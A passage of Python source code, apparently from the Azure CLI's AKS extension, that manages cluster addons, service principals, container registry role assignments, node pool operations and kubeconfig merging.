addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
workload_runtime=None,
gpu_instance_profile=None,
snapshot_id=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
workload_runtime=workload_runtime,
gpu_instance_profile=gpu_instance_profile,
creation_data=creationData
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,
aks_custom_headers=None,
snapshot_id=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
max_surge=None,
mode=None,
labels=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not scale_down_mode and not mode and not max_surge and labels is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode" or "--labels"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_stop(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Stopped")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_start(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Running")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_addon_list_available():
available_addons = []
for k, v in ADDONS.items():
available_addons.append({
"name": k,
"description": ADDONS_DESCRIPTIONS[v]
})
return available_addons
def aks_addon_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
current_addons = []
for name, addon in ADDONS.items():
if not addon_profiles or addon not in addon_profiles:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": False
})
else:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": addon_profiles[addon].enabled
})
return current_addons
def aks_addon_show(cmd, client, resource_group_name, name, addon): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return {
"name": addon,
"api_key": addon_key,
"config": addon_profiles[addon_key].config,
"identity": addon_profiles[addon_key].identity
}
def aks_addon_enable(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
return enable_addons(cmd, client, resource_group_name, name, addon, workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_addon_disable(cmd, client, resource_group_name, name, addon, no_wait=False):
return aks_disable_addons(cmd, client, resource_group_name, name, addon, no_wait)
def aks_addon_update(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return enable_addons(cmd, client, resource_group_name, name, addon, check_enabled=False,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None, no_wait=False, enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
msi_auth = True if instance.service_principal_profile.client_id == "msi" else False # this is overwritten by _update_addons(), so the value needs to be recorded here
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if not msi_auth:
raise ArgumentUsageError("--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profile.config = {logAnalyticsConstName: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
